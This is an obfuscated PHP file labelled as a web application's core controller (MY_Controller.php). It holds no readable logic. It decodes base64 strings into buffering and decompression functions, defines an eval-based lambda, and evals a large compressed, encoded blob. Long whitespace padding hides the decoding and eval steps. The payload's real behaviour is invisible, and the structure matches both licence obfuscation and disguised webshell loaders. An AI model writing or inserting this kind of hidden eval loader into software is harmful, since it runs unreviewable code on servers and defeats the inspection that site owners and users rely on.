<?php 
        $__='printf';$_='Loading donjo-app/core/MY_Controller.php';
        



































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































                                                                                                                                                                                                                     $________;
